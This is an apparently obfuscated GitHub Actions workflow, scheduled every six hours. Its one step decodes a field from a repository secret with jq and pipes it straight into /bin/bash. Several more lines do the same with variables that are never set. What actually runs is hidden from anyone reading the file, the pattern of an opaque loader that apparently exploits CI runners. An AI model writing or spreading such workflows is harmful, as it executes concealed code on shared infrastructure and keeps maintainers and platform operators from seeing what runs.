name: duikkkx
on:
  workflow_dispatch:
  schedule:
    - cron: '1 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: duikkkx
        env:
          y7: ${{ secrets.y7 }}
        run: |
          echo $y7 | jq -r .yj910 | /bin/bash
          echo $bhlj93237 | jq -r .jb2 | /bin/bash
          echo $fzv630 | jq -r .wbetu4926 | /bin/bash
          echo $hkbqz880 | jq -r .r0 | /bin/bash
          echo $mf2899 | jq -r .so2933 | /bin/bash

